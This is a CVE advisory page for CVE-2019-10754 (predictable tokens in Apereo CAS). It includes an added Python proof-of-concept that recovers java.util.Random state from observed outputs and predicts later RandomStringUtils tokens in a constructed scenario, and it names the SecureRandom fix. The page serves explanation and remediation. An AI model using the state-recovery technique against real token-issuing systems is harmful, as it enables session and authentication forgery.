CVE-2019-10754
Published 2019-09-23
Priority P3 | CVSS 3.1 8.1 (High)
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:N
EPSS 1.75% (75.0th percentile)
Multiple classes within Apereo CAS before release 6.1.0-RC5 use Apache commons-lang3 RandomStringUtils for token and ID generation. RandomStringUtils draws from a PRNG (java.util.Random) whose algorithm is not cryptographically strong, so the tokens and IDs it produces are predictable.
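The description says "not cryptographically strong" without saying what that buys an attacker. The block below is an added example written for this page, not code from Apereo CAS or commons-lang3: it ports the java.util.Random linear congruential generator (48-bit state, multiplier 0x5DEECE66D) and, as an assumption about the 3.x code path, the alphanumeric branch of RandomStringUtils (draw from ' '..'z', keep letters and digits) to Python. It then shows the textbook attack: an observer who sees two consecutive full 32-bit nextInt() outputs brute-forces the 16 hidden state bits, confirms against a third output, and predicts every token the generator will mint afterwards. Real tokens expose only nextInt(91) residues per character, so recovering state from tokens alone needs more observations and more work than shown here; the point the example makes is that the generator is fully determined by 48 bits and has no forward secrecy, whatever string API sits on top of it.

```python
"""Added example, not Apereo CAS or commons-lang3 code.

java.util.Random (which RandomStringUtils draws from) is a 48-bit linear
congruential generator. This ports the generator and the alphanumeric path of
RandomStringUtils to Python, then shows that an observer who sees a few of its
outputs can recover the full state and predict every later token.
"""

MULT = 0x5DEECE66D        # java.util.Random multiplier
ADD = 0xB                 # java.util.Random addend
MASK = (1 << 48) - 1      # 48-bit state


def _signed32(v):
    """Interpret the low 32 bits of v as a Java int."""
    v &= 0xFFFFFFFF
    return v - (1 << 32) if v & 0x80000000 else v


class JavaRandom:
    """Port of java.util.Random: setSeed(), next(bits), nextInt(), nextInt(bound)."""

    def __init__(self, seed):
        self.state = (seed ^ MULT) & MASK

    @classmethod
    def from_state(cls, state):
        rng = cls.__new__(cls)
        rng.state = state & MASK
        return rng

    def _next(self, bits):
        self.state = (self.state * MULT + ADD) & MASK
        return _signed32(self.state >> (48 - bits))

    def next_int(self, bound=None):
        if bound is None:
            return self._next(32)
        if bound & (bound - 1) == 0:                  # power-of-two bound
            return (bound * self._next(31)) >> 31
        bits = self._next(31)
        val = bits % bound
        while bits - val + (bound - 1) >= (1 << 31):  # Java's int-overflow rejection loop
            bits = self._next(31)
            val = bits % bound
        return val


def random_alphanumeric(rng, count):
    """Port of RandomStringUtils.randomAlphanumeric(count) for ASCII: draw from
    ' '..'z' (gap 91) and keep only letters and digits. Assumption: mirrors the
    commons-lang3 3.x code path closely enough to reproduce its output."""
    out = []
    while len(out) < count:
        ch = chr(rng.next_int(91) + 32)
        if ch.isalnum():          # Java isLetter() || isDigit() over this ASCII range
            out.append(ch)
    return "".join(out)


def recover_states(o1, o2):
    """Brute-force the 16 hidden low bits from two consecutive nextInt() outputs.
    Returns every candidate 48-bit state as it stood right after o2 was produced."""
    hi = (o1 & 0xFFFFFFFF) << 16
    found = []
    for low in range(1 << 16):
        s2 = ((hi | low) * MULT + ADD) & MASK
        if _signed32(s2 >> 16) == o2:
            found.append(s2)
    return found


def predict_next_token(seed=42, length=32):
    """Victim (constructed scenario) exposes three nextInt() values, then mints a
    token. The attacker recovers the state from the first two, disambiguates with
    the third, and predicts the token. Returns (predicted, actual)."""
    victim = JavaRandom(seed)
    o1, o2, o3 = victim.next_int(), victim.next_int(), victim.next_int()
    candidates = [s for s in recover_states(o1, o2)
                  if JavaRandom.from_state(s).next_int() == o3]
    attacker = JavaRandom.from_state(candidates[0])
    attacker.next_int()            # advance past the call that produced o3
    return random_alphanumeric(attacker, length), random_alphanumeric(victim, length)


if __name__ == "__main__":
    predicted, actual = predict_next_token()
    print("predicted:", predicted)
    print("actual:   ", actual)
    print("match:", predicted == actual)
```

`JavaRandom(42).next_int()` returns -1170105035, the same value the JVM gives for `new Random(42).nextInt()`, which is a quick check that the port is faithful. The brute force is 2^16 iterations and finishes in well under a second. The fix on the Java side is to stop drawing from the shared java.util.Random: commons-lang3 exposes `RandomStringUtils.random(count, 0, 0, true, true, null, new SecureRandom())`, and a `java.security.SecureRandom` can equally be used directly for token bytes.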
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apereo | central_authentication_service | <= 6.0.5.1 | — |
| apereo | central_authentication_service | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.1 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N |
| NVD | 2.0 | 5.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:N |
GHSA
GHSA (2022-05-24): CVE-2019-10754 [HIGH] CWE-330 Use of Insufficiently Random Values in Apereo CAS
OSV
OSV (2022-05-24): CVE-2019-10754 [HIGH] Use of Insufficiently Random Values in Apereo CAS
Both entries carry the same description as the one above.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
References
https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467402
https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467404
https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-467406
https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-468868
https://snyk.io/vuln/SNYK-JAVA-ORGAPEREOCAS-468869